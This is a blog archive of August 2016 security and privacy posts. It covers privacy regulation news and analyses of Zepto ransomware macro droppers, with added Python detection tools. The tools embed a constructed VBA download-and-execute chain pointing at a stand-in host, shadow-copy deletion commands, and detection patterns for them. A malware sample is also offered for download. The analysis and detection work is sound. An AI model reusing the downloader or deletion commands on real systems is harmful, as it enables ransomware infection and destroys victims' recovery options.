Monthly Archives: August 2016

Enterprise Security Weekly #13 – To MSSP or not to MSSP

Threat intelligence gets funding, security products move to the cloud, incorporating VirusTotal into your products, and two-factor authentication for VoIP. To MSSP or not to MSSP, that is the question. All that and more on Enterprise Security Weekly!

WhatsApp Updates Privacy Policy to Share Information with Facebook

On August 25, 2016, WhatsApp announced in a blog post that the popular mobile messaging platform updated its Terms of Service and Privacy Policy to permit certain information sharing with Facebook. After Facebook acquired WhatsApp in 2014, the Director of the FTC’s Bureau of Consumer Protection wrote a letter to both Facebook and WhatsApp that discussed the companies’ obligations to honor privacy statements made to consumers in connection with the acquisition.

WhatsApp has developed FAQs that discuss the changes to the Terms of Service and Privacy Policy. In addition to describing new product features, such as WhatsApp Calling, the FAQs describe the new information sharing with Facebook. WhatsApp will begin to share users’ phone numbers that are registered with WhatsApp, as well as the last time that individuals used the service. According to the update, WhatsApp will not disclose the content of any messages or photos sent via WhatsApp to Facebook.

The information disclosed to Facebook will be used for several purposes. These include enabling WhatsApp and Facebook to (1) more accurately count users, (2) fight spam and abuse, and (3) improve user experiences across WhatsApp and Facebook services, such as providing better friend suggestions and more relevant ads on Facebook. WhatsApp will provide its users with the ability to opt out from sharing information with Facebook for the purpose of improving Facebook ads and product experiences.

Zepto Evasion Techniques

We’ve been tracking more spam dropping Zepto ransomware variants. As in earlier posts, the entry point is an attachment carrying a malicious macro script. (See the images below of some recent spam samples.)

[Image: recent Zepto spam samples]

Digging deeper, we found that these macro scripts are not crafted by hand: the malware authors have automated both the generation and the obfuscation of the code. Randomized obfuscation of this kind is one way of evading antivirus engines. As outlined below, our research highlights several methods used to continually change the attack vector so that it slips past signature-based detection.

From the malicious emails we have gathered, we examined the attachments for key differences and common characteristics.

In one sample, the malicious code is written across three sub-modules:

[Image: VBA project with three sub-modules]

In another, five sub-modules are used:

[Image: VBA project with five sub-modules]

Examining the sub-modules of each file shows some common signatures that we can look for:

[Image: Zepto macro code]
[Image: Zepto hidden code]

We found blocks of code that share a common structure, even though they sit at different positions in the module. From a programmer’s perspective this looks odd, but as the analysis continues it becomes clear that it is part of the malware author’s strategy to hide the code and confuse incident responders.

Notice the highlighted strings from both screenshots that are common across the two samples. At first glance they look meaningless; the significant strings only appear once garbage strings such as:

  • “RIIM”
  • “PORKKI”

are removed or replaced with nothing, at which point they read:

  • “microsoft”
  • “”
  • “script”
  • “application”

More significant still is what these scripts do. The highlighted strings are surrounded by what we can now safely assume is garbage code, there for misdirection and to further obfuscate the malicious logic.
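To show how the strings above are recovered, here is an added example (not code from the original post, and not taken from any real sample): a small Python deobfuscator that finds the tokens a macro’s Replace() calls delete, strips them from every string literal, and evaluates simple "…" & Chr(n) & "…" concatenations. The VBA fragment, its variable names and where the junk tokens are spliced in are all constructed for illustration, modelled on the pattern described.

```python
import re

# Constructed VBA fragment modelled on the pattern described above: junk tokens
# ("RIIM", "PORKKI") are spliced into the strings the macro really needs and
# removed again at run time with Replace(). This is sample input written for
# this example, not code taken from an actual Zepto downloader.
SAMPLE_VBA = r'''
Sub AutoOpen()
    Dim RIIMv1 As String
    RIIMv1 = Replace("MiRIIMcroRIIMsoft.XMRIIMLHTTP", "RIIM", "")
    Dim PORKKIv2 As String
    PORKKIv2 = Replace("WPORKKIScriPORKKIpt.ShPORKKIell", "PORKKI", "")
    Dim v3 As String
    v3 = "ShRIIMell" & Chr(46) & "AppPORKKIlication"
    Set o1 = CreateObject(Replace(Replace(v3, "RIIM", ""), "PORKKI", ""))
End Sub
'''

STRING_LITERAL = re.compile(r'"([^"]*)"')
# The search argument of Replace(<expr>, "<token>", ""): the token being deleted.
REPLACE_TOKEN = re.compile(r',\s*"([^"]+)"\s*,\s*""\s*\)')
REPLACE_WRAPPER = re.compile(r'Replace\((.*),\s*"[^"]+"\s*,\s*""\s*\)$', re.IGNORECASE)
CHR_CALL = re.compile(r'Chr\((\d+)\)', re.IGNORECASE)
ASSIGNMENT = re.compile(r'^\s*(\w+)\s*=\s*(.+)$', re.MULTILINE)


def find_junk_tokens(src):
    """Tokens that Replace() deletes and that also appear spliced into other literals."""
    literals = STRING_LITERAL.findall(src)
    candidates = set(REPLACE_TOKEN.findall(src))
    # Guard against ordinary Replace(x, " ", "") calls: a junk token must show up
    # inside at least one other literal.
    return {t for t in candidates if any(t in lit and lit != t for lit in literals)}


def strip_junk(text, tokens):
    """Remove every junk token, longest first so nested tokens are handled cleanly."""
    for tok in sorted(tokens, key=len, reverse=True):
        text = text.replace(tok, "")
    return text


def eval_string_expr(expr, tokens):
    """Evaluate "lit" & Chr(n) & "lit" expressions; None if anything else appears."""
    parts = []
    for part in expr.split("&"):        # assumes no '&' inside the literals themselves
        part = part.strip()
        m = CHR_CALL.fullmatch(part)
        if m:
            parts.append(chr(int(m.group(1))))
        elif len(part) >= 2 and part[0] == '"' and part[-1] == '"':
            parts.append(strip_junk(part[1:-1], tokens))
        else:
            return None                 # variable, call or other non-string expression
    return "".join(parts)


def recover_strings(src):
    """Return (junk tokens, {variable: recovered string}) for a VBA module."""
    tokens = find_junk_tokens(src)
    recovered = {}
    for m in ASSIGNMENT.finditer(src):
        name, rhs = m.group(1), m.group(2).strip()
        # Peel Replace(x, "tok", "") wrappers; strip_junk removes the tokens anyway.
        while True:
            w = REPLACE_WRAPPER.match(rhs)
            if not w:
                break
            rhs = w.group(1).strip()
        value = eval_string_expr(rhs, tokens)
        if value is not None:
            recovered[name] = value
    return tokens, recovered


if __name__ == "__main__":
    junk, strings = recover_strings(SAMPLE_VBA)
    print("junk tokens:", sorted(junk))
    for var, val in strings.items():
        print(f"{var} = {val!r}")
```

Run on the constructed fragment, the three assignments resolve to Microsoft.XMLHTTP, WScript.Shell and Shell.Application, the object names behind the “microsoft”, “script”, “shell” and “application” fragments highlighted above. Real samples add further layers (split strings in arrays, arithmetic on character codes), so treat this as the first pass an analyst would bolt onto a macro extractor such as olevba, not a complete deobfuscator.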

The usual flow of the scripts we analyzed is:

[Image: Zepto infection process]

At this point, the payload of the downloaded Zepto ransomware will take over.

As with the other Zepto downloaders we have observed, the scripts also vary in the encrypted URLs they carry. Below are some of the URLs from which the monitored scripts attempted to download Zepto; imagine how many of these are generated and how many differently structured scripts are in the wild. Macro scripts are not the only delivery vehicle, either: there are also JavaScript and WSF downloaders.

[Image: Zepto download links]

With some twists of social engineering, creativity and advanced programming skills, cybercriminals are becoming increasingly adept at delivering Zepto and other ransomware payloads to both business and home users.

[Image: Zepto infection screen]

Prevent Ransomware Infections?

To prevent ransomware, we recommend blocking it early, at the root of its infection chain. Here are some tips:

  • Always keep your operating system, applications and security products patched and up to date
  • Take precaution when opening attachments, especially when sent by an unknown sender
  • Never enable VBA macros by default in any Microsoft Office application. Some macro malware even instructs you how to enable macros, or tricks you into doing so.
  • Deploy solutions that protect you from sophisticated and pervasive threats like ransomware, including advanced endpoint protection like VIPRE Endpoint Security, a malware behavior analysis tool like ThreatAnalyzer, and solutions to detect and disrupt active cyber attacks like ThreatSecure
  • Regularly back up your data

VIPRE Antivirus Detections for this threat include:

  • (v)
  • Trojan-Downloader.O97M.Donoff.bu (v)
  • OLE.Generic.a (v)



Analysis by Daryl Tupaz

The post Zepto Evasion Techniques appeared first on ThreatTrack Security Labs Blog.

Lisa Sotto Speaks on Cybersecurity: Evolution of the Practice (Part 2)

As we previously reported, Lisa J. Sotto, partner and head of Hunton & Williams LLP’s Global Privacy and Cybersecurity practice group, spoke at Bloomberg Law’s Second Annual Big Law Business Summit on changes in the privacy and security legal landscape. In Part 2 of her discussion, Lisa speaks about the evolution of privacy laws over the years. The “hundreds of [privacy laws] at the federal and state level,” as well as data protection laws in countries all over the world, are a far cry from the landscape in 1999 when Lisa started the privacy practice at Hunton & Williams. To keep up with the evolution of data privacy, lawyers and regulators alike must understand that it’s “a 24/7 endeavor,” and one that is global in nature. “Data is not constrained by state or country boundaries,” says Sotto.

View the second segment.

Linux.Agent malware sample – data stealer

Research: SentinelOne, Tim Strazzere: “Hiding in plain sight?”
Sample credit: Tim Strazzere

List of files

SHA256:

9f7ead4a7e9412225be540c30e04bf98dbd69f62b8910877f0f33057ca153b65  malware
d507119f6684c2d978129542f632346774fa2e96cf76fa77f377d130463e9c2c  malware
fddb36800fbd0a9c9bfffb22ce7eacbccecd1c26b0d3fb3560da5e9ed97ec14c  script.decompiled-pretty
ec5d4f90c91273b3794814be6b6257523d5300c28a492093e4fa1743291858dc  script.decompiled-raw
4d46893167464852455fce9829d4f9fcf3cce171c6f1a9c70ee133f225444d37  script.dumped

MD5:

malware                   fcbfb234b912c84e052a4a393c516c78
script.decompiled-pretty  aab8ea012eafddabcdeee115ecc0e9b5
script.decompiled-raw     ae0ea319de60dae6d3e0e58265e0cfcc
script.dumped             b30df2e63bd4f35a32f9ea9b23a6f9e7


Download. Email me if you need the password

China Enacts E-Hailing Regulation to Protect Driver and Passenger Data

Last month, the People’s Republic of China’s Ministry of Transportation, Ministry of Industry and Information Technology and six other administrative departments jointly published the Interim Measures for the Administration of Operation and Services of E-hailing Taxis (the “Measures”). E-hailing is an increasingly popular business in China and has already become a compelling alternative to the traditional taxi. The Measures seek to regulate this emerging industry, and will come into effect on November 1, 2016. Below is a summary of the key requirements.

The Measures contain a data localization requirement under which operators of e-hailing platforms will be required to locate their servers within mainland China. In addition, personal information collected on e-hailing platforms and business data generated during their operations must be stored and used within mainland China, and such information and data must be retained for at least two years.

The Measures also require operators of e-hailing platforms to expressly disclose the purpose, method and scope of the collection and use of the personal information of drivers and passengers while on the platforms. Operators of e-hailing platforms will be required to follow the principle of necessity when they collect personal information of drivers and passengers and may not use such personal information for other businesses without the consent of the data subjects.

Under the Measures, operators of e-hailing platforms must not, except for purposes of cooperating with supervisory authorities or with criminal investigations, provide the personal information of drivers and passengers (such as names, contact information, home addresses, bank or payment accounts, geographical location or travel routes) to any third parties. They are also prohibited from disclosing sensitive information relating to national security, such as geographical coordinates and symbols.

The Measures also require operators of e-hailing platforms to adopt systems for the administration of cybersecurity and technical security measures. In the event of an information leakage, operators of e-hailing platforms must report to the relevant competent authority without delay and take timely and effective remedial measures.

E-hailing platform operators that illegally use or disclose passengers’ personal information may face a penalty of RMB 2,000 to RMB 10,000. They may also be subject to civil liability for compensation and criminal sanctions.

OMB Updates Federal Information Management Policies

The Office of Management and Budget (“OMB”) recently issued updates to Circular A-130 covering the management of federal information resources. OMB revised Circular A-130 “to reflect changes in law and advances in technology, as well as to ensure consistency with Executive Orders, Presidential Directives, and other OMB policy.” The revised policies are intended to transform how privacy is addressed across federal agencies.

In its press release announcing the revised document, OMB noted that “as government continues to digitize, we must ensure we manage data not only to keep it secure, but also [to] allow us to harness this information to provide the best possible service to our citizens.” Thus, according to OMB, the updated Circular A-130 combines in one document “a wide range of policy updates for federal agencies” on issues relating to “cybersecurity, information governance, privacy, records management, open data, and acquisitions.” It also covers issues relating to IT planning and budgeting.

Specifically, Circular A-130 focuses on the following three elements “to help spur innovation throughout the government”:

  • Real Time Knowledge of the Environment: Replacing periodic compliance-driven assessments with ongoing monitoring of federal information resources.
  • Proactive Risk Management: Focusing on modernizing the way in which the government identifies, categorizes and handles privacy and security risks.
  • Shared Responsibility: Focusing on shared responsibility and accountability for privacy and security among managers, employees and citizens.

According to OMB, the revised Circular A-130 “represents a shift from viewing security and privacy requirements as compliance exercises to understanding security and privacy as crucial components of a comprehensive, strategic, and continuous risk-based program.”

The fact sheet released with the press release indicates that the updated Circular A-130 “promotes innovation, enables information sharing, and fosters the wide-scale and rapid adoption of new technologies while protecting and enhancing security and privacy.”

Circular A-130 has two appendixes: Appendix I is titled Responsibilities for Protecting and Managing Federal Information Resources and Appendix II is titled Responsibilities for Managing Personally Identifiable Information (PII).

Appendix II, which is completely new, focuses on agency responsibilities for managing PII, applying the fair information practice principles, conducting privacy impact assessments, maintaining an inventory of PII, privacy training, privacy contracting and applying the NIST Risk Management Framework to manage privacy risks in the context of agency privacy programs.

Donoff Macro Dropping Ransomware

Recently, we’ve spotted Zepto ransomware spreading through spam email containing fake invoices (see image below). The attachment is a macro-enabled Word document, detected as Donoff, which downloads the Zepto executable; Zepto then encrypts all of the victim’s files and demands payment for the decryption key.

[Image: Donoff malicious macro sample]

We decided to take a closer look at the Donoff macro used to download the Zepto ransomware. Here is what we found:

The VBA Macro code

At first glance, the code is fully commented in Spanish and uses randomly generated variable names.

Here is a look at the code:

[Image: Donoff macro code]

Retrieving Zepto

The Word document contains two macro procedures, autoopen and ActualizarEntrada.

[Image: Donoff Spanish-commented code]

Here are more snips of code showing the processing of obfuscated text.

[Image: Donoff obfuscated text processing]

These are the strings revealed after deobfuscation.

  • streaM
  • Application
  • shell
  • Process
  • GeT
  • TeMP
  • Type
  • open
  • write
  • responseBody
  • savetofile
  • \sysdrubpas.exe

The VBA macro uses the Microsoft.XMLHTTP and ADODB.Stream objects to download Zepto.

The Microsoft.XMLHTTP object is part of Microsoft’s XML DOM (Document Object Model) components and was designed to give client-side code access to XML documents on remote servers over HTTP. In practice it can request or send any kind of document, which is why macro downloaders favor it.

The ADODB.Stream object reads, writes and manages a stream of binary data or text; here it receives the HTTP response body and writes it to disk.


The following code decrypts to:

[Image: decrypted macro code]

Here’s the code that downloads the encrypted Zepto executable file:

[Image: download routine]


The encrypted download is written to disk as TempWFDSAdrweg. The macro then decrypts it with the key Aw3WSr7dB3RlPpLVmGVTtXcQ3WG8kQym and writes the decrypted binary to sysdrubpas.exe in the %temp% folder, which is usually C:\Users\<username>\AppData\Local\Temp.


Decryption code:

[Image: decryption code]

Encrypted Zepto (shown here as a hex dump):

[Image: encrypted Zepto]

Decrypted Zepto (now in executable form):

[Image: decrypted Zepto]

The macro then executes sysdrubpas.exe, infecting the user’s system.
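As an added example (not the post’s own code and not the real macro), the Python scanner below checks a deobfuscated macro for the stages of this download, write-to-disk, execute chain. It matches case-insensitively because VBA is, so the mixed-case names from the recovered string list (streaM, GeT, TeMP, savetofile) hit where an exact-case string signature would miss. The macro text, the URL and the variable names are constructed for the example; the MSXML2 ProgIDs in the first rule are a common alternative to Microsoft.XMLHTTP that the post does not mention.

```python
import re
from collections import OrderedDict

# Constructed macro text standing in for the deobfuscated Donoff downloader described
# above, using the mixed-case names from the recovered string list. It is sample input
# written for this example, not the real macro; the URL and variable names are invented.
SAMPLE_MACRO = r'''
Sub autoopen()
    ActualizarEntrada
End Sub

Sub ActualizarEntrada()
    Set req = CreateObject("MicroSoft.XMLhttp")
    Set stm = CreateObject("Adodb.streaM")
    Set sh = CreateObject("WScript.shell")
    tmp = sh.ExpandEnvironmentStrings("%TeMP%")
    req.open "GeT", "http://example.invalid/counter/", False
    req.send
    stm.Type = 1
    stm.open
    stm.write req.responseBody
    stm.savetofile tmp & "\TempWFDSAdrweg", 2
    ' the real sample decrypts the download here before running it
    sh.Run tmp & "\sysdrubpas.exe", 0
End Sub
'''

# One regex per stage of the chain. Capturing groups pull out the detail an analyst
# wants in the report (URL, dropped-file expression, command run).
STAGES = OrderedDict([
    ("http_object",    r'CreateObject\(\s*"(?:Microsoft\.XMLHTTP|MSXML2\.(?:Server)?XMLHTTP[\w.]*)"\s*\)'),
    ("stream_object",  r'CreateObject\(\s*"ADODB\.Stream"\s*\)'),
    ("shell_object",   r'CreateObject\(\s*"(?:WScript\.Shell|Shell\.Application)"\s*\)'),
    ("http_request",   r'\.open\s+"(?:GET|POST)"\s*,\s*"(https?://[^"]+)"'),
    ("body_to_stream", r'\.write\s+\w+\.responseBody'),
    ("save_to_disk",   r'\.savetofile\s+(.+?)\s*,\s*\d'),
    ("temp_dir",       r'%TEMP%'),
    ("execute",        r'\.(?:Run|Exec)\s+(.+?)(?:\s*,\s*\d+)?\s*$'),
])

# The stages that, together, mean "fetch a file and run it".
DOWNLOAD_AND_RUN = ("http_object", "http_request", "body_to_stream", "save_to_disk", "execute")


def scan_macro(src):
    """Map each stage name to its captured detail (URL, file expression...) or True."""
    hits = {}
    for name, pattern in STAGES.items():
        m = re.search(pattern, src, re.IGNORECASE | re.MULTILINE)
        if m:
            hits[name] = m.group(1) if m.groups() else True
    return hits


def classify(hits):
    """Verdict from the set of stages present."""
    if all(stage in hits for stage in DOWNLOAD_AND_RUN):
        return "download-and-execute"
    if "http_request" in hits and "save_to_disk" in hits:
        return "download-to-disk"
    return "no downloader chain"


def naive_match(src):
    """Exact-case substring signature: the kind of check the mixed-case names slip past."""
    return all(s in src for s in ("Microsoft.XMLHTTP", "ADODB.Stream", "SaveToFile"))


if __name__ == "__main__":
    found = scan_macro(SAMPLE_MACRO)
    for stage, detail in found.items():
        print(f"{stage:15s} {detail}")
    print("verdict:", classify(found))
    print("exact-case signature would fire:", naive_match(SAMPLE_MACRO))
```

On the constructed macro every stage is present and the verdict is download-and-execute, with the URL and the %TEMP%\sysdrubpas.exe expression captured for the report, while the exact-case check returns False. Run this after string deobfuscation, not before: against the raw Donoff source the literals are still split and junk-laden, and none of the rules would fire.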


ThreatAnalyzer – Malware Sandbox Analysis

When executed in our malware analysis sandbox, ThreatAnalyzer, here is the process tree spawned by the malicious Word document:

[Image: Donoff analysis process tree]

The ThreatAnalyzer Behavioral Determination Engine flags this as a 100% malicious file and found dozens of suspicious behaviors.

[Image: Donoff processes]

One notable behavior common to ransomware is the deletion of Volume Shadow Copies, which prevents easy restoration of files from Windows’ built-in previous versions.


Other behaviors are very similar to those in our previous post about Zepto ransomware.
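One way to turn the sandbox observations above into a check, written here as an added example rather than ThreatAnalyzer’s own logic: the Python below parses a constructed process tree, flags an Office process launching a binary from the user’s Temp folder, and flags shadow-copy deletion anywhere beneath it, reporting the ancestry back to the document. The process lines and their “pid ppid image|cmdline” format are invented for this example, and the specific deletion commands (vssadmin delete shadows, wmic shadowcopy delete, bcdedit recoveryenabled no, wbadmin delete catalog) are the usual ones, an assumption since the post does not show which the sample used.

```python
import re
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid image cmdline")

# Constructed process tree in a simple "pid ppid image|cmdline" layout, modelled on the
# behaviour described above (Word -> dropped EXE in %TEMP% -> shadow copy deletion).
# These are sample lines written for this example, not ThreatAnalyzer output.
SAMPLE_TREE = r'''
1000 800 explorer.exe|C:\Windows\explorer.exe
1200 1000 WINWORD.EXE|"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" /n "C:\Users\analyst\Downloads\invoice.doc"
1300 1200 sysdrubpas.exe|C:\Users\analyst\AppData\Local\Temp\sysdrubpas.exe
1400 1300 cmd.exe|cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
1500 1400 vssadmin.exe|vssadmin.exe Delete Shadows /All /Quiet
1600 1000 notepad.exe|C:\Windows\System32\notepad.exe
'''

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
TEMP_PATH_RE = re.compile(r'\\AppData\\Local\\Temp\\|%TEMP%', re.IGNORECASE)
# Assumed typical shadow-copy / recovery-disabling commands; the post does not show
# which one the sample issued.
SHADOW_DELETE_RE = re.compile(
    r'vssadmin(?:\.exe)?\s+delete\s+shadows'
    r'|wmic(?:\.exe)?\s+shadowcopy\s+delete'
    r'|bcdedit(?:\.exe)?.*recoveryenabled\s+no'
    r'|wbadmin(?:\.exe)?\s+delete\s+catalog', re.IGNORECASE)


def parse_tree(text):
    """Build {pid: Proc} from the constructed line format."""
    procs = {}
    for line in text.strip().splitlines():
        head, cmdline = line.split("|", 1)
        pid, ppid, image = head.split(None, 2)
        procs[int(pid)] = Proc(int(pid), int(ppid), image, cmdline)
    return procs


def ancestry(procs, pid):
    """The process and its known ancestors, child first."""
    chain = []
    while pid in procs:
        chain.append(procs[pid])
        pid = procs[pid].ppid
    return chain


def analyse(procs):
    """Return findings as tuples: (kind, pid[, ancestor image names])."""
    findings = []
    for p in procs.values():
        parent = procs.get(p.ppid)
        if parent and parent.image.lower() in OFFICE_IMAGES and TEMP_PATH_RE.search(p.cmdline):
            findings.append(("office_drops_and_runs_temp_binary", p.pid))
        if SHADOW_DELETE_RE.search(p.cmdline):
            # Record the full chain so the report ties the deletion back to the document.
            chain = [a.image for a in ancestry(procs, p.pid)]
            findings.append(("shadow_copy_deletion", p.pid, chain))
    return findings


def verdict(findings):
    kinds = {f[0] for f in findings}
    if {"office_drops_and_runs_temp_binary", "shadow_copy_deletion"} <= kinds:
        return "macro-delivered ransomware behaviour"
    if "shadow_copy_deletion" in kinds:
        return "shadow copy deletion"
    return "nothing notable"


if __name__ == "__main__":
    tree = parse_tree(SAMPLE_TREE)
    results = analyse(tree)
    for f in results:
        print(f)
    print("verdict:", verdict(results))
```

Both the cmd.exe wrapper and vssadmin.exe itself are reported, each with its ancestry up to WINWORD.EXE and explorer.exe, and the combination with the Temp-folder launch yields the ransomware verdict. The same two rules translate directly into endpoint telemetry queries (parent image, image path, command line) if you want to catch this outside the sandbox.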

Prevent Ransomware Infections?

To prevent ransomware, we recommend blocking it early, at the root of its infection chain. Here are some tips:

  • Always keep your operating system, applications and security products patched and up to date
  • Take precaution when opening attachments, especially when sent by an unknown sender
  • Never enable VBA macros by default in any Microsoft Office application. Some macro malware even instructs you how to enable macros, or tricks you into doing so.
  • Deploy solutions that protect you from sophisticated and pervasive threats like ransomware, including advanced endpoint protection like VIPRE Endpoint Security, a malware behavior analysis tool like ThreatAnalyzer, and solutions to detect and disrupt active cyber attacks like ThreatSecure
  • Regularly back up your data


e98aee56175daaa96f259d04077d820f – malicious DOC attachment ( (v))

837a5b0dbd5850634bfecadadc751cdd – Zepto executable (Trojan.Win32.Generic!BT)

Analysis by Wilmina Elizon

The post Donoff Macro Dropping Ransomware appeared first on ThreatTrack Security Labs Blog.

Hack Naked TV – August 18, 2016

Well, the “shortage” of IT and InfoSec professionals may have just been solved by Cisco. Yesterday Cisco announced it is planning to cut 5,500 jobs from its workforce. The layoffs will supposedly allow the company to invest in key priorities such as security, IoT, collaboration, next-generation data center and cloud.


China Publishes Regulation on the Use of Resident Identity Cards

Recently, the People’s Republic of China’s Ministry of Public Security, the National Development and Reform Commission and six other administrative departments jointly published the Announcement on Regulating the Administration of the Use of Resident Identity Cards (the “Announcement”). The Announcement came into effect on July 15, 2016, the date of its issuance.

The Announcement reiterates existing prohibitions against leasing, lending or assigning a resident identity card to another person, and reiterates an existing requirement that resident identity cards must not be seized or held as a security by government agencies, related entities or their staff.

According to the Announcement, when performing their duties or providing services, personnel of government agencies and related entities must not arbitrarily record the personal information of citizens that appears on their resident identity cards. Additionally, government agencies, related entities or their personnel cannot arbitrarily copy or scan identity cards of residents. The Announcement encourages citizens to resist unauthorized copying, scanning or seizure of their resident identity cards.

Government agencies and related entities are required to establish administrative systems for the security of personal information and develop those systems to their fullest extent, adopt internal storage systems for personal information that use strict access authorization procedures and strengthen their security measures to avoid the leakage or theft of information.

Government agencies and related entities are also required to establish a “blacklist” of individuals having a history of using the resident identity cards of other persons as their own, and to adopt information sharing mechanisms.

Lisa Sotto Speaks on Cybersecurity: Changes in Legal Landscape (Part 1)

Lisa J. Sotto, partner and head of Hunton & Williams LLP’s Global Privacy and Cybersecurity practice group, recently spoke at Bloomberg Law’s Second Annual Big Law Business Summit. In Part 1 of the panel discussion, Lisa describes the dramatic changes in the legal landscape of privacy over the last 10 to 15 years, discussing the emergence of privacy laws such as “the Gramm-Leach-Bliley Act for the financial sector, HIPAA for the health care sector and…of course, the local implementation of the European Data Protection Directive.” She goes on to note an “explosion” in the legal landscape in 2005 due to the first data breach that drew national attention, after which, “cyber and privacy grew in parallel.”

View this first segment.

AIG Launches Cyber-BI and PD Policy

As reported in the Hunton Insurance Recovery Blog, insurance giant American International Group (“AIG”) announced that it will be the first insurer to offer standalone primary coverage for property damage, bodily injury, business interruption and product liability that results from cyber attacks and other cyber-related risks. According to AIG, “Cyber is a peril [that] can no longer be considered a risk covered by traditional network security insurance product[s].” The new AIG product, known as CyberEdge Plus, is intended to offer broader and clearer coverage for harms that had previously raised issues with insurers over the scope of available coverage. AIG explains its new coverage as follows:

“CyberEdge can provide companies with protection against the following:

  • Third-party claims arising from a failure of the insured’s network security or a failure to protect data. Insurance also responds to regulatory actions in connection with a security failure, privacy breach, or the failure to disclose a security failure or privacy breach.
  • Direct first-party costs of responding to a security failure or privacy breach by paying costs of notifications, public relations, and other services to assist in managing and mitigating a cyber incident. Forensic investigations, legal consultations, and identity monitoring costs for victims of a breach are all covered.
  • Business interruption caused by a network security failure by reimbursing for resulting lost income and operating expenses.
  • Threats made against a company’s computer network and confidential information by an outsider attempting to extort money, securities, or other valuables. Coverage includes monies paid to end the threat and the cost of an investigation to determine the cause of the threat.
  • Liability faced by companies for content distributed on their website. Coverage is provided for numerous media perils including copyright infringement, trademark infringement, defamation, and invasion of privacy.”

AIG is offering its new coverage with limits of up to $100 million.


Here is my opinion on FPC. 

Full packet capture can be an intrusion analyst's best friend. Consider this example: You receive an alert that an internal device accessed a piece of JavaScript on some web site and the rule says there was an object use-after-free attempt. You need to inspect that code and see if it is malicious and preferably, what occurred afterwards. 

You could use a tool like wget or Spondulas to download the code, or you could use a sandboxed machine to browse to the URI and view the source. You could put the URI into some online site checker and see what it finds. You could check the reputation of the domain.

But, what if you are capturing full packets going in and out of your network to the Internet?

You can pull up the URI in a tool like Moloch or a commercial tool, and look at the session. You can see the JavaScript as it was delivered exactly to THAT client, running that OS, using that browser and user-agent and see what happened afterwards. You can save the code off as a file to further inspect it and run the pcap through Wireshark or SteelCentral Packet Analyzer or Netwitness or some other analysis tool.

You CAN do intrusion analysis without FPC, but you can't do it as quickly OR as effectively. 
Flow data and logs and threat intelligence are all fine (well, maybe not so much on the threat intelligence) but having packets trumps them all.

OCR Settles Largest HIPAA Violation Against a Single Covered Entity

On August 4, 2016, the U.S. Department of Health and Human Services’ Office for Civil Rights (“OCR”) entered into a resolution agreement with Advocate Health Care Network (“Advocate”), the largest health care system in Illinois, over alleged HIPAA violations. The $5.5 million settlement with Advocate is the largest settlement to date against a single covered entity.

Following the submission of three breach notification reports by Advocate in 2013 that affected approximately 4 million individuals, OCR investigated Advocate and found it had failed to (1) conduct an accurate and thorough risk assessment, (2) limit physical access to its data center that contained electronic protected health information (“ePHI”), (3) obtain satisfactory assurances from its business associate that it would adequately safeguard ePHI, and (4) reasonably safeguard ePHI by leaving an unencrypted laptop containing ePHI in an unlocked vehicle overnight.

The resolution agreement requires Advocate to pay $5.5 million to OCR and enter into a Corrective Action Plan that obligates Advocate to:

  • modify its existing risk analysis to include a complete inventory of all Advocate facilities, equipment, systems and applications that contain or store ePHI;
  • develop and implement a comprehensive risk management plan to address those risks and vulnerabilities identified in the risk analysis;
  • implement a process for evaluating environmental or operational changes that affect the security of Advocate’s ePHI;
  • develop an encryption report that explains why any Advocate device and equipment are not encrypted;
  • review and revise its policies and procedures on device and media controls, facility access controls and business associates;
  • enhance its existing security awareness training program;
  • submit an Internal Monitoring Plan to OCR;
  • report any events of noncompliance with its HIPAA policies and procedures; and
  • submit a detailed Implementation Report to OCR within 120 days after its approval of its risk management plan, as well as annual compliance reports for a period of two years.

In announcing the settlement with Advocate, OCR Director Jocelyn Samuels noted that “[w]e hope this settlement sends a strong message to covered entities that they must engage in a comprehensive risk analysis and risk management to ensure that individuals’ ePHI is secure.” Director Samuels further emphasized reducing the “risks to ePHI in all physical locations and on all portable devices to a reasonable and appropriate level.”

The large monetary settlement with Advocate resulted from several factors, including (1) the extent and duration of Advocate’s noncompliance with the HIPAA rules; (2) the involvement of the Illinois Attorney General in a parallel investigation of Advocate, and (3) the large number of individuals affected by the Advocate breaches.

China’s State Administration for Industry and Commerce Publishes Draft Regulations on the Protection of Consumer Rights

The State Administration for Industry and Commerce of the People’s Republic of China published a draft of its Implementing Regulations for the P.R.C. Law on the Protection of the Rights and Interests of Consumers (the “Draft”) for public comment. The Draft is open for comment until September 5, 2016.

The Draft reiterates the requirements under the law that business operators must follow the principles of legitimacy, rightfulness and necessity when they collect and use the personal information of consumers. They also must expressly state the purposes, methods and scope of their collection and use of the information, and obtain the consent of the consumers. It also provides that business operators may not collect information that is irrelevant to their operations, or collect information in an improper way. Under the Draft, a business operator is required to retain, for at least five years, supporting documentation that can demonstrate its performance of its obligation to expressly inform and obtain the consent of consumers.

Business operators are required to adopt information security systems to ensure the security of the personal information of consumers. Business operators are required not to provide consumers’ personal information to other parties without the consumers’ consent, except in cases where the consumers’ personal information is anonymized in such a way that it cannot identify the specific individual and that the anonymization cannot be reversed.

In the event that a business operator suffers an information security breach which results in the disclosure or loss of information, or anticipates that such a breach is likely, the business operator is required to adopt remedial measures and promptly inform the affected consumers of such breach.

Compared with the original definition of “consumers’ personal information” in the earlier Measures for the Punishment of Conduct Infringing the Rights and Interests of Consumers, the scope of the term “consumers’ personal information” under the Draft additionally includes biometric features.

According to the Draft, without consumers’ express consent or request, business operators may not send them commercial electronic messages or make commercial marketing calls. Business operators also may not cause consumers to bear the costs of sending commercial electronic messages or making commercial marketing calls, unless otherwise agreed by the parties.

FTC Reverses ALJ Decision, Finds LabMD Liable for Unfair Data Security Practices

On July 29, 2016, the Federal Trade Commission (“FTC”) announced that it had issued an opinion and final order concluding that LabMD, Inc. (“LabMD”) violated the unfairness prong of Section 5 of the FTC Act by failing to maintain reasonable security practices to protect consumers’ sensitive personal information. The unanimous decision reverses a November 2015 administrative law judge’s initial decision that, as we previously reported, dismissed the FTC’s charges against LabMD for failing to show that LabMD’s allegedly unreasonable data security practices caused, or were likely to cause, substantial consumer injury.

The case stems from allegations that LabMD, a now-defunct clinical laboratory for physicians, failed to protect the sensitive personal information (including medical information) of consumers, resulting in two specific security incidents. One such incident occurred when a third party informed LabMD that an insurance-related report, which contained personal information of approximately 9,300 LabMD clients (including names, dates of birth and Social Security numbers), was available on a peer-to-peer (“P2P”) file-sharing network.

